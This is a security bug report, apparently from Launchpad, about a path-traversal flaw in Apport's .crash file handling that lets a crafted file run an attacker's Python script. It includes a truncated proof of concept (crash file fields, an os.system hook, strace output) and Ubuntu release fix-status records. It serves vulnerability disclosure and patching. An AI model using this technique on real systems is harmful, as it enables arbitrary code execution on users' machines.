Code execution through path traversal in .crash files processing
| Affects | Status | Importance | Assigned to | Milestone | |
|---|---|---|---|---|---|
| Apport |
Fix Released
|
High
|
Unassigned | ||
| apport (Ubuntu) |
Fix Released
|
High
|
Brian Murray | ||
| Trusty |
Fix Released
|
High
|
Unassigned | ||
| Xenial |
Fix Released
|
High
|
Unassigned | ||
| Yakkety |
Fix Released
|
High
|
Unassigned | ||
| Zesty |
Fix Released
|
High
|
Unassigned | ||
| Artful |
Fix Released
|
High
|
Brian Murray | ||
Bug Description
The function add_hooks_info in apport/report.py is vulnerable to a directory traversal when processing the ExecutablePath key of a malicious .crash file:
opt_path = None
if self.get(
elif package:
# check package contents
try:
for f in apport.
except ValueError:
# uninstalled package
if opt_path:
while len(opt_path) >= len(_opt_dir):
This can be used to execute an arbitrary python script from an attacker controlled path when a crash file is opened:
fwilhelm@box:~$ cat poc.crash
ProblemType: Bug
ExecutablePath: /opt/..
Package: f
fwilhelm@box:~$ cat /tmp/poc/
import os
os.system(
fwilhelm@bpx:~$ strace -eprocess -f /usr/share/
[pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-
[pid 62617] execve(
The sub directory requirement makes this a bit tricky to exploit remotely, but depending on the environment a malicious USB drive, a shared NFS share or a crash file inside an archive could be used.
Please credit Felix Wilhelm from the Google Security Team in all releases, patches and advisories related to these issues.
CVE References
| Changed in apport (Ubuntu Trusty): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Xenial): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Yakkety): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Zesty): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Artful): | |
| status: | New → Confirmed |
| Changed in apport (Ubuntu Trusty): | |
| importance: | Undecided → High |
| Changed in apport (Ubuntu Xenial): | |
| importance: | Undecided → High |
| Changed in apport (Ubuntu Yakkety): | |
| importance: | Undecided → High |
| Changed in apport (Ubuntu Zesty): | |
| importance: | Undecided → High |
| Changed in apport (Ubuntu Artful): | |
| importance: | Undecided → High |
| Changed in apport: | |
| status: | Confirmed → Fix Released |
| importance: | Undecided → High |
| information type: | Private Security → Public Security |
| tags: | added: patch |
| Changed in apport (Ubuntu Artful): | |
| status: | Confirmed → In Progress |
| assignee: | nobody → Brian Murray (brian-murray) |

Hi Felix - thanks for the report! I don't immediately see how an attacker could have control of what Apport uses for ExecutablePath in the crash file. Is there more to your attack than hand crafting a .crash file and running apport-gtk on it or am I missing something here?
Subscribing bdmurray for Ubuntu apport expertise.